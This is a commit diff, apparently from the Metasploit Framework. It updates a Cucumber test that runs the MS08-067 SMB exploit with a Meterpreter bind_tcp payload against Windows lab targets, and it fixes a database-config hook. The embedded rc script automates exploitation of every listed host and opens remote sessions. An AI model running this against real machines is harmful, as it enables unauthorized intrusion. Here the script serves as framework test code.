This is a combination of 5 commits.

@db tests not working because the part where we tell it to connect to the database was commented out. There was a race condition causing the rc script to exit before all of the sessions were opened. This change properly waits for us to get the expected number of sessions before exiting. Use a more reliable form of the rc script. Didn't mean to commit the schema.rb Forgot new line
2016-07-27 12:18:02 -05:00 · 2016-07-27 12:18:02 -05:00 · 3a254a9441
parent ee40c9d809
commit 3a254a9441
2 changed files with 39 additions and 13 deletions
--- a/features/modules/exploit/smb/ms08_067_netapi.feature
+++ b/features/modules/exploit/smb/ms08_067_netapi.feature
@ -10,18 +10,39 @@ Feature: MS08-067 netapi
    Given I ready the windows targets
    Given a file named "ms08-067-bind.rc" with:
      """
-        <ruby>
-          hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
-          self.run_single('use exploit/windows/smb/ms08_067_netapi')
-          self.run_single('set payload windows/meterpreter/bind_tcp')
-          hosts.each do |host|
-            self.run_single("set RHOST #{host['ipAddress']}")
-            self.run_single('run -j')
-            sleep 1
-          end
-          self.run_single('sessions -K')
-        </ruby>
+      <ruby>
+      self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
+      hosts           = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
+      payload_name    = 'windows/meterpreter/bind_tcp'
+      exploited_hosts = []
+      failed_hosts    = []
+
+      hosts.each do |host|
+        print_status("Trying MS08-067 against #{host['ipAddress']}")
+        mod = framework.exploits.create('windows/smb/ms08_067_netapi')
+        mod.datastore['PAYLOAD'] = payload_name
+        mod.datastore['RHOST'] = host['ipAddress']
+        m = mod.exploit_simple(
+          'LocalInput'  => nil,
+          'LocalOutput' => nil,
+          'Payload'     => payload_name,
+          'RunAsJob'    => false
+        )
+
+        sleep(1)
+
+        if m
+          exploited_hosts << host['ipAddress']
+        else
+          failed_hosts << host['ipAddress']
+        end
+      end
+
+      print_status("Exploited hosts: #{exploited_hosts.inspect}")
+      print_status("Failed hosts: #{failed_hosts.inspect}")
+      self.run_single('sessions -K')
+      </ruby>
      """
-    When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
+    When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
    Then the 'Mdm::Host' table contains the expected targets
    
--- a/features/support/hooks.rb
+++ b/features/support/hooks.rb
@ -1,9 +1,14 @@
 Before do
-  set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
+  set_env('MSF_DATABASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
  set_env('RAILS_ENV', 'test')
  @aruba_timeout_seconds = 8.minutes
 end

+Before('@db') do |scenario|
+  dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
+  ActiveRecord::Base.establish_connection(dbconfig["test"])
+end
+
 # don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
 # unless Bundler.settings.without.include?(:coverage)
 #   Before do |scenario|